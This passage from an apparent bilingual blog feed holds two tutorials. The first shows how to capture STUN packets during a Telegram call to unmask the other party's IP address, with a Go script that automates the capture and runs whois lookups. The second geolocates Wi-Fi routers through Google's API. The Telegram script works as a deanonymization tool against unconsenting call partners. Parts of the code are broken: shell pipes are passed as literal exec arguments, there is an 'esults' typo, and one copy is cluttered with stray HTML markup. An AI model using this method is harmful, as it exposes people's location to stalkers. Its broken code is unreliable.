        hostCmd := exec.Command("host", IP)
        hostOutput, err := hostCmd.Output()
        if err != nil {
            log.Fatal("Error getting host information:", err)
        }

        fmt.Println("[+]")
        fmt.Println("[+] IP Address:", IP)
        fmt.Println("[+] Host:", strings.TrimSpace(string(hostOutput)))
        fmt.Println("[+]")

        // Clean up temporary files
        err = os.Remove(CAP_PATH)
        if err != nil {
            log.Fatal("Cleanup error:", err)
        }

        err = os.Remove(CAP_TEXT)
        if err != nil {
            log.Fatal("Cleanup error:", err)
        }

        fmt.Println("[+] Cleanup completed.")
    } else {
        fmt.Println("[-] Telegram traffic not found.")
        fmt.Println("[!]")
        fmt.Println("[!] Run this script only >>>AFTER<<< the response.")
        fmt.Println("[!]")
        os.Exit(1)
    }

    fmt.Println("[?]")
    fmt.Print("[?] Run whois", IP, "? (Y/N): ")

    // Check if the user wants to run the whois command
    var answer string
    fmt.Scanln(&answer)

    if strings.ToUpper(answer) == "Y" {
        whoisCmd := exec.Command("whois", IP)
        whoisOutput, err := whoisCmd.Output()
        if err != nil {
            log.Fatal("Error running whois command:", err)
        }

        fmt.Println(string(whoisOutput))
    } else {
        fmt.Println("[+] Goodbye!")
        os.Exit(0)
    }
}

Conclusion

By using Wireshark and analyzing STUN traffic on Telegram, we can discover the IP address of the user we are interacting with. This information can be useful for various purposes, such as checking the geographical location of the user or identifying potential network issues.

However, it is important to remember that user privacy should always be respected. The use of these techniques should be done ethically and within legal limits.

References:

https://medium.com/@ibederov_en/find-out-the-ip-address-through-a-call-to-telegram-a899441b1bac

https://www.wireshark.org/

https://go.dev/

Como descobrir o endereço IP do usuário usando Telegram.

Higor Diego — Thu, 08 Jun 2023 15:33:02 +0000

Se você já se perguntou como funcionam os aplicativos de mensagens, como Telegram e WhatsApp, por trás das conversas, este artigo é para você. Vamos explorar uma maneira de descobrir o endereço IP do usuário com quem estamos interagindo no Telegram, utilizando o poderoso Wireshark, uma ferramenta de análise de tráfego de rede.

Passo 1: Baixando o Wireshark

Antes de começar, você precisa baixar e instalar o Wireshark em seu computador. Você pode encontrar o download no site oficial do Wireshark.

Certifique-se de escolher a versão compatível com o seu sistema operacional.

Passo 2: Filtrando o Tráfego STUN

Após abrir o Wireshark, você verá uma interface que captura o tráfego de rede em tempo real. Vamos filtrar o tráfego STUN, que é o protocolo utilizado pelo Telegram para a comunicação.
Na barra de filtros, clique no ícone de busca para abrir a opção de busca. Em seguida, selecione a opção "String" e digite "XOR-MAPPED-ADDRESS" na linha de busca.

Passo 3: Iniciando a Captura de Dados

Agora, estamos prontos para iniciar a captura de dados. Certifique-se de que o Wireshark esteja em execução e realize uma chamada via Telegram para o usuário com quem deseja descobrir o endereço IP.
Assim que o usuário atender a chamada, o Wireshark começará a exibir os dados capturados. Procure na lista por informações relacionadas ao protocolo STUN, e você encontrará o endereço IP do usuário que recebeu a chamada.

Passo 4: Identificando o Endereço IP
Para facilitar a identificação do endereço IP desejado, utilize a função de busca do Wireshark. Clique na opção "Find" e digite "XOR-MAPPED-ADDRESS" na linha de busca. O endereço IP do usuário aparecerá imediatamente após essa string.

Automatizando com Golang

Com o uso da linguagem de programação Golang, podemos automatizar todo o processo descrito acima. A seguir, apresentamos um código em Golang que realiza essa tarefa de forma eficiente e confiável:



package main

import (
 "fmt"
 "log"
 "os"
 "os/exec"
 "strings"
)

func main() {
 const CAP_PATH = "/tmp/tg_cap.pcap" // Caminho temporário para o arquivo de captura pcap
 const CAP_TEXT = "/tmp/tg_text.txt" // Caminho temporário para o arquivo de texto com informações
 const CAP_DURATION = "5"            // Duração da captura em segundos

 // Obter o endereço IP externo do dispositivo
 ipCmd := exec.Command("curl", "-s", "icanhazip.com")
 ipOutput, err := ipCmd.Output()
 if err != nil {
  log.Fatal("Falha ao obter o endereço IP:", err)
 }
 MY_IP := strings.TrimSpace(string(ipOutput))

 // Verificar se o Wireshark está instalado
 _, err = exec.LookPath("tshark")
 if err != nil {
  log.Println("[-] Wireshark não foi encontrado. Tente instalar o Wireshark primeiro.")
  log.Println("[+] Debian baseado: sudo apt-get install -y tshark")
  log.Println("[+] Baseado em RedHat: sudo yum install -y tshark")
  os.Exit(1)
 }

 fmt.Println("[+] Descobrindo o Endereço IP do Usuário no Telegram usando Golang")
 fmt.Println("[+] Iniciando a captura de tráfego. Aguarde", CAP_DURATION, "segundos...")

 // Iniciar a captura de tráfego com o Wireshark
 captureCmd := exec.Command("tshark", "-w", CAP_PATH, "-a", "duration:"+CAP_DURATION)
 captureOutput, err := captureCmd.CombinedOutput()
 if err != nil {
  log.Fatal("Erro na captura de tráfego:", err)
 }

 fmt.Println("[+] Tráfego capturado.")

 // Converter o arquivo pcap para um arquivo de texto legível
 convertCmd := exec.Command("tshark", "-r", CAP_PATH)
 convertOutput, err := convertCmd.Output()
 if err != nil {
  log.Fatal("Erro ao converter o arquivo pcap para texto:", err)
 }

 err = os.WriteFile(CAP_TEXT, convertOutput, 0644)
 if err != nil {
  log.Fatal("Erro ao escrever o arquivo de texto:", err)
 }

 fmt.Println("[+] Arquivo pcap convertido com sucesso.")

 // Verificar se o tráfego do Telegram está presente no arquivo de texto
 if strings.Contains(string(convertOutput), "STUN 106") {
  fmt.Println("[+] Tráfego do Telegram foi encontrado.")

  // Extrair o endereço IP do texto
  extractCmd := exec.Command("cat", CAP_TEXT, "|", "grep", "STUN 106", "|", "sed", "'s/^.*XOR-MAPPED-ADDRESS: //'", "|", "awk", "'{match($0,/[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+/); ip = substr($0,RSTART,RLENGTH); print ip}' | awk '!seen[$0]++'")
  extractOutput, err := extractCmd.Output()
  if err != nil {
   log.Fatal("Erro ao extrair o endereço IP:", err)
  }

  TG_OUT := strings.TrimSpace(string(extractOutput))
  IP_1 := strings.Fields(TG_OUT)[0]
  IP_2 := strings.Fields(TG_OUT)[1]

  var IP string

  // Verificar se o endereço IP é o nosso ou do destinatário
  if MY_IP == IP_1 {
   IP = IP_2
  } else if MY_IP == IP_2 {
   IP = IP_1
  } else {
   IP = "[-] Desculpe. Endereço IP não encontrado."
   os.Exit(1)
  }

  // Obter informações de host para o endereço IP
  hostCmd := exec.Command("host", IP)
  hostOutput, err := hostCmd.Output()
  if err != nil {
   log.Fatal("Erro ao obter informações de host:", err)
  }

  fmt.Println("[+]")
  fmt.Println("[+] Endereço IP:", IP)
  fmt.Println("[+] Host:", strings.TrimSpace(string(hostOutput)))
  fmt.Println("[+]")

  // Limpar os arquivos temporários
  err = os.Remove(CAP_PATH)
  if err != nil {
   log.Fatal("Erro na limpeza:", err)
  }

  err = os.Remove(CAP_TEXT)
  if err != nil {
   log.Fatal("Erro na limpeza:", err)
  }

  fmt.Println("[+] Limpeza concluída.")
 } else {
  fmt.Println("[-] Tráfego do Telegram não foi encontrado.")
  fmt.Println("[!]")
  fmt.Println("[!] Execute este script somente >>>APÓS<<< a resposta.")
  fmt.Println("[!]")
  os.Exit(1)
 }

 fmt.Println("[?]")
 fmt.Print("[?] Executar whois", IP, "? (S/N): ")

 // Verificar se o usuário deseja executar o comando whois
 var answer string
 fmt.Scanln(&answer)

 if strings.ToUpper(answer) == "S" {
  whoisCmd := exec.Command("whois", IP)
  whoisOutput, err := whoisCmd.Output()
  if err != nil {
   log.Fatal("Erro ao executar o comando whois:", err)
  }

  fmt.Println(string(whoisOutput))
 } else {
  fmt.Println("[+] Tchau tchau!")
  os.Exit(0)
 }
}

Conclusão

Utilizando o Wireshark e a análise do tráfego STUN no Telegram, podemos descobrir o endereço IP do usuário com quem estamos interagindo. Essa informação pode ser útil para diversos propósitos, como verificar a localização geográfica do usuário ou identificar possíveis problemas de rede.

No entanto, é importante lembrar que a privacidade dos usuários deve ser sempre respeitada. O uso dessas técnicas deve ser feito de maneira ética e dentro dos limites legais.

Referências:

https://medium.com/@ibederov_en/find-out-the-ip-address-through-a-call-to-telegram-a899441b1bac

https://www.wireshark.org/

https://go.dev/

Find out how to use Google to locate your home using just your Wi-Fi router!

Higor Diego — Sat, 27 May 2023 22:45:26 +0000

Did you know that Google has a location search engine called "Wifi access point object"? This functionality is described in detail in the documentation, which you can check out by clicking here.

It's really amazing, isn't it? Let's explore this feature further!

Have you heard of BSSID? Also known as Basic Service Set Identifier, this term may sound complicated, but it's actually quite useful for understanding how your Wi-Fi router works. The BSSID is like a unique "name" given to the router, allowing your devices to identify it on the network.

Think of the BSSID as a MAC address for your router. It plays a crucial role in enabling your devices to connect to it quickly and efficiently. When scanning for available Wi-Fi networks on your device, you can see the BSSID as a combination of letters and numbers.

Why is this important? Well, understanding the BSSID can be extremely helpful when setting up or troubleshooting issues on your wireless network. It helps identify the specific router you're connecting to, which can be useful when adjusting settings or resolving connection problems.

So, the next time you come across the term BSSID, remember that it refers to the unique identifier of your Wi-Fi router. It's a key element in ensuring a stable and reliable connection in your home or workplace network.

If you want to view the BSSIDs of Wi-Fi routers around you, we have a simple command for you. Here's how:

Open the terminal and type the following command:



sudo /System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport -s

It's important to run the above command with administrator privileges to ensure you have access to the necessary information. For security reasons, the BSSID will not be displayed if you run the command without proper permissions.

The terminal output will look similar to this:



            SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
    "confidencial" XX:5f:67:XX:c5:4d -81  8       Y  -- RSN(PSK/AES/AES) 
    "confidencial" 00:31:92:XX:e7:36 -50  9       Y  -- RSN(PSK/AES/AES) 
    "confidencial" cc:06:XX:db:e2:XX -50  4       Y  -- RSN(PSK/AES/AES) 
        "confidencial" a4:XX:a4:ed:XX:7c -47  2       Y  BR WPA(PSK/AES,TKIP/TKIP) RSN(PSK/AES,TKIP/TKIP) 
"confidencial" cc:06:77:db:e2:84 -66  36,+1   Y  -- RSN(PSK/AES/AES) 
    "confidencial" 00:31:XX:XX:e7:37 -57  48,-1   Y  BR RSN(PSK/AES/AES) 
  "confidencial", fa:XX:ca:86:ca:96 -26  6       Y  -- NONE
      "confidencial" a4:6d:a4:XX:33:XX -49  36      Y  BR WPA(PSK/AES,TKIP/TKIP) RSN(PSK/AES,TKIP/TKIP)

Once you have obtained the BSSID of the desired Wi-Fi router, you can use the Google API to obtain accurate geolocation data. Here's how to do it using a simple command in the terminal:



curl --location --request GET 'https://www.googleapis.com/geolocation/v1/geolocate?key=YourAPIKeyHere' \
--header 'Content-Type: application/json' \
--data '{
    "wifiAccessPoints":[ 
        {
            "macAddress": "BSSIDOfTheRouterHere" 
        }
    ]
}'

Before proceeding, it's important to replace "YourAPIKeyHere" with your Google API key, which you can obtain by creating a developer account on the Google Cloud Platform. Be sure to add the correct key to ensure proper access to the API.

When you run the command, the system will send a GET request to the Google Geolocation API, passing the router's BSSID as a parameter. This allows Google to identify the approximate location of the router based on its geolocation information.

Furthermore, by examining the structure of the example calls, you can input multiple Wi-Fi MAC addresses along with signal strength. This way, the API will use triangulation techniques to provide an even more accurate location.

It's worth noting that the geolocation API can also find locations based on cell tower IDs. This means you can obtain accurate location information even when you're not connected to a Wi-Fi network.

Now let's create some code to automate the above process using the Go programming language.

Here's the code:



package main

import (

    "bytes"

    "encoding/json"

    "fmt"

    "log"

    "net/http"

    "os/exec"

    "runtime"

    "strings"

)

func getWifiMacAddresses() map[string]map[string]string {

    var results []byte

    var err error

<span class="k">switch</span> <span class="n">runtime</span><span class="o">.</span><span class="n">GOOS</span> <span class="p">{</span>
<span class="k">case</span> <span class="s">"darwin"</span><span class="o">:</span>
    <span class="n">results</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">exec</span><span class="o">.</span><span class="n">Command</span><span class="p">(</span><span class="s">"/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport"</span><span class="p">,</span> <span class="s">"-s"</span><span class="p">)</span><span class="o">.</span><span class="n">Output</span><span class="p">()</span>
<span class="k">case</span> <span class="s">"windows"</span><span class="o">:</span>
    <span class="n">results</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">exec</span><span class="o">.</span><span class="n">Command</span><span class="p">(</span><span class="s">"netsh"</span><span class="p">,</span> <span class="s">"wlan"</span><span class="p">,</span> <span class="s">"show"</span><span class="p">,</span> <span class="s">"network"</span><span class="p">)</span><span class="o">.</span><span class="n">Output</span><span class="p">()</span>
<span class="k">case</span> <span class="s">"linux"</span><span class="o">:</span>
    <span class="n">results</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">exec</span><span class="o">.</span><span class="n">Command</span><span class="p">(</span><span class="s">"iwlist"</span><span class="p">,</span> <span class="s">"scanning"</span><span class="p">)</span><span class="o">.</span><span class="n">Output</span><span class="p">()</span>
<span class="p">}</span>

<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
    <span class="n">log</span><span class="o">.</span><span class="n">Fatal</span><span class="p">(</span><span class="n">err</span><span class="p">)</span>
<span class="p">}</span>

<span class="k">var</span> <span class="n">macAddr</span> <span class="o">=</span> <span class="nb">make</span><span class="p">(</span><span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">)</span>
<span class="n">lines</span> <span class="o">:=</span> <span class="n">strings</span><span class="o">.</span><span class="n">Split</span><span class="p">(</span><span class="n">strings</span><span class="o">.</span><span class="n">TrimSpace</span><span class="p">(</span><span class="kt">string</span><span class="p">(</span><span class="n">results</span><span class="p">)),</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">)[</span><span class="m">1</span><span class="o">:</span><span class="p">]</span>
<span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">line</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">lines</span> <span class="p">{</span>
    <span class="n">fields</span> <span class="o">:=</span> <span class="n">strings</span><span class="o">.</span><span class="n">Fields</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
    <span class="n">addr</span> <span class="o">:=</span> <span class="n">fields</span><span class="p">[</span><span class="m">0</span><span class="p">]</span>
    <span class="n">db</span> <span class="o">:=</span> <span class="n">fields</span><span class="p">[</span><span class="m">1</span><span class="p">]</span>
    <span class="c">// additional fields if needed</span>

    <span class="n">macAddr</span><span class="p">[</span><span class="n">addr</span><span class="p">]</span> <span class="o">=</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">{</span>
        <span class="s">"signalStrength"</span><span class="o">:</span> <span class="n">db</span><span class="p">,</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">return</span> <span class="n">macAddr</span>



}

func main() {

    postjson := make(map[string]interface{})

    postjson["wifiAccessPoints"] = []map[string]interface{}{}

    hotspots := getWifiMacAddresses()

<span class="k">for</span> <span class="n">addr</span><span class="p">,</span> <span class="n">info</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">hotspots</span> <span class="p">{</span>
    <span class="n">signalStrength</span> <span class="o">:=</span> <span class="n">info</span><span class="p">[</span><span class="s">"signalStrength"</span><span class="p">]</span>
    <span class="n">postjson</span><span class="p">[</span><span class="s">"wifiAccessPoints"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">postjson</span><span class="p">[</span><span class="s">"wifiAccessPoints"</span><span class="p">]</span><span class="o">.</span><span class="p">([]</span><span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="k">interface</span><span class="p">{}),</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="k">interface</span><span class="p">{}{</span>
        <span class="s">"macAddress"</span><span class="o">:</span>     <span class="n">addr</span><span class="p">,</span>
        <span class="s">"signalStrength"</span><span class="o">:</span> <span class="n">signalStrength</span><span class="p">,</span>
    <span class="p">})</span>
<span class="p">}</span>

<span class="n">googleMapsAPIkey</span> <span class="o">:=</span> <span class="s">"your_google_maps_api_key"</span>
<span class="n">url</span> <span class="o">:=</span> <span class="s">"https://www.googleapis.com/geolocation/v1/geolocate?key="</span> <span class="o">+</span> <span class="n">googleMapsAPIkey</span>

<span class="n">data</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Marshal</span><span class="p">(</span><span class="n">postjson</span><span class="p">)</span>
<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
    <span class="n">log</span><span class="o">.</span><span class="n">Fatal</span><span class="p">(</span><span class="n">err</span><span class="p">)</span>
<span class="p">}</span>

<span class="n">response</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">http</span><span class="o">.</span><span class="n">Post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="s">"application/json"</span><span class="p">,</span> <span class="n">bytes</span><span class="o">.</span><span class="n">NewBuffer</span><span class="p">(</span><span class="n">data</span><span class="p">))</span>
<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
    <span class="n">log</span><span class="o">.</span><span class="n">Fatal</span><span class="p">(</span><span class="n">err</span><span class="p">)</span>
<span class="p">}</span>

<span class="k">defer</span> <span class="n">response</span><span class="o">.</span><span class="n">Body</span><span class="o">.</span><span class="n">Close</span><span class="p">()</span>

<span class="k">var</span> <span class="n">result</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="k">interface</span><span class="p">{}</span>
<span class="n">json</span><span class="o">.</span><span class="n">NewDecoder</span><span class="p">(</span><span class="n">response</span><span class="o">.</span><span class="n">Body</span><span class="p">)</span><span class="o">.</span><span class="n">Decode</span><span class="p">(</span><span class="o">&amp;</span><span class="n">result</span><span class="p">)</span>

<span class="n">fmt</span><span class="o">.</span><span class="n">Println</span><span class="p">(</span><span class="n">result</span><span class="p">)</span>



}

Conclusion

In this blog post, we explored how to use the Go programming language to automate the retrieval of Wi-Fi MAC addresses and leverage the Google Geolocation API. With the developed code, it's possible to obtain accurate information about nearby Wi-Fi routers and send them to the API, thereby obtaining an approximate location.

I hope this was helpful. Until next time! (:

Descubra como usar o Google para localizar sua casa utilizando apenas o seu roteador Wi-Fi!

Higor Diego — Sat, 27 May 2023 22:31:16 +0000

Você sabia que o Google possui um mecanismo de busca de localização chamado "Wifi access point object"? Essa funcionalidade é descrita em detalhes na documentação, que você pode conferir clicando aqui.

É realmente incrível, não é mesmo? Vamos explorar mais esse recurso!

Você já ouviu falar do BSSID? Também conhecido como Basic Service Set Identifier, esse termo pode parecer complicado, mas na verdade é bastante útil para entender como funciona o seu roteador Wi-Fi. O BSSID é como um "nome" exclusivo dado ao roteador, permitindo que seus dispositivos o identifiquem na rede.

Imagine que o BSSID é como um endereço MAC para o seu roteador. Ele desempenha um papel fundamental ao permitir que seus dispositivos se conectem a ele de forma rápida e eficiente. Ao escanear as redes Wi-Fi disponíveis em seu dispositivo, você pode visualizar o BSSID como uma combinação de letras e números.

Por que isso é importante? Bem, compreender o BSSID pode ser extremamente útil ao configurar ou solucionar problemas em sua rede sem fio. Ele ajuda a identificar o roteador específico ao qual você está se conectando, o que pode ser útil ao ajustar configurações ou solucionar problemas de conexão.

Portanto, da próxima vez que você se deparar com o termo BSSID, lembre-se de que ele se refere ao identificador exclusivo do seu roteador Wi-Fi. É um elemento-chave para garantir uma conexão estável e confiável em sua rede doméstica ou local de trabalho.

Se você deseja visualizar os BSSID dos roteadores Wi-Fi ao seu redor, temos um comando simples para você. Acompanhe:

Abra o terminal e digite o seguinte comando:

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport -s

É importante executar o comando acima com permissões de administrador para garantir que você tenha acesso às informações necessárias. Por motivos de segurança, o BSSID não será exibido se você executar o comando sem as permissões adequadas.

O output do terminal será parecido com esse:

            SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
    "confidencial" XX:5f:67:XX:c5:4d -81  8       Y  -- RSN(PSK/AES/AES) 
    "confidencial" 00:31:92:XX:e7:36 -50  9       Y  -- RSN(PSK/AES/AES) 
    "confidencial" cc:06:XX:db:e2:XX -50  4       Y  -- RSN(PSK/AES/AES) 
        "confidencial" a4:XX:a4:ed:XX:7c -47  2       Y  BR WPA(PSK/AES,TKIP/TKIP) RSN(PSK/AES,TKIP/TKIP) 
"confidencial" cc:06:77:db:e2:84 -66  36,+1   Y  -- RSN(PSK/AES/AES) 
    "confidencial" 00:31:XX:XX:e7:37 -57  48,-1   Y  BR RSN(PSK/AES/AES) 
  "confidencial", fa:XX:ca:86:ca:96 -26  6       Y  -- NONE
      "confidencial" a4:6d:a4:XX:33:XX -49  36      Y  BR WPA(PSK/AES,TKIP/TKIP) RSN(PSK/AES,TKIP/TKIP)

Depois de obter o BSSID do roteador Wi-Fi desejado, você pode utilizar a API do Google para obter dados de geolocalização precisa. Veja como fazer isso usando um comando simples no terminal:

curl --location --request GET 'https://www.googleapis.com/geolocation/v1/geolocate?key=SuaChaveAPIAqui' \
--header 'Content-Type: application/json' \
--data '{
    "wifiAccessPoints":[ 
        {
            "macAddress": "BSSIDDoRoteadorAqui" 
        }
    ]
}'

Antes de prosseguir, é importante substituir "SuaChaveAPIAqui" pela chave de API do Google que você pode obter ao criar uma conta de desenvolvedor no Google Cloud Platform. Certifique-se de adicionar a chave correta para garantir o acesso adequado à API.

Ao executar o comando, o sistema enviará uma solicitação GET para a API do Google Geolocation, passando o BSSID do roteador como parâmetro. Isso permitirá que o Google identifique a localização aproximada do roteador com base em suas informações de geolocalização.

Além disso, ao analisar a estrutura dos exemplos de chamadas, você pode inserir vários endereços MAC Wi-Fi juntamente com a intensidade do sinal. Dessa forma, a API utilizará técnicas de triangulação para fornecer uma localização ainda mais precisa.

É interessante destacar que a API de geolocalização também pode encontrar locais com base em IDs de torres de celular. Isso significa que você pode obter informações precisas de localização mesmo quando não está conectado a uma rede Wi-Fi.

Agora vamos criar um código para automatizar esse processo acima usando a linguagem golang.

Segue o código abaixo:

package main

import (
    "bytes"
    "encoding/json"
    "fmt"
    "log"
    "net/http"
    "os/exec"
    "runtime"
    "strings"
)

func getWifiMacAddresses() map[string]map[string]string {
    var results []byte
    var err error

    switch runtime.GOOS {
    case "darwin":
        results, err = exec.Command("/System/Library/PrivateFrameworks/Apple80211.framework/Resources/airport", "-s").Output()
    case "windows":
esults, err = exec.Command("netsh", "wlan", "show", "network").Output()
    case "linux":
        // results, err = exec.Command("iwlist", "scanning").Output()
    }

    if err != nil {
        log.Fatal(err)
    }

    var macAddr = make(map[string]map[string]string)
    lines := strings.Split(strings.TrimSpace(string(results)), "\n")[1:]
    for _, line := range lines {
        fields := strings.Fields(line)
        addr := fields[0]
        db := fields[1]
        // additional fields if needed

        macAddr[addr] = map[string]string{
            "signalStrength": db,
        }
    }

    return macAddr
}

func main() {
    postjson := make(map[string]interface{})
    postjson["wifiAccessPoints"] = []map[string]interface{}{}
    hotspots := getWifiMacAddresses()

    for addr, info := range hotspots {
        signalStrength := info["signalStrength"]
        postjson["wifiAccessPoints"] = append(postjson["wifiAccessPoints"].([]map[string]interface{}), map[string]interface{}{
            "macAddress":     addr,
            "signalStrength": signalStrength,
        })
    }

    googleMapsAPIkey := "your_google_maps_api_key"
    url := "https://www.googleapis.com/geolocation/v1/geolocate?key=" + googleMapsAPIkey

    data, err := json.Marshal(postjson)
    if err != nil {
        log.Fatal(err)
    }

    response, err := http.Post(url, "application/json", bytes.NewBuffer(data))
    if err != nil {
        log.Fatal(err)
    }

    defer response.Body.Close()

    var result map[string]interface{}
    json.NewDecoder(response.Body).Decode(&result)

    fmt.Println(result)
}

Conclusão

Nesta postagem, exploramos como utilizar a linguagem de programação Go para automatizar a obtenção de endereços MAC Wi-Fi e aproveitar a API de geolocalização do Google. Com o código desenvolvido, é possível obter informações precisas sobre roteadores Wi-Fi próximos e enviá-las para a API, obtendo assim uma localização aproximada.

Espero ter ajudado, até a próxima ( :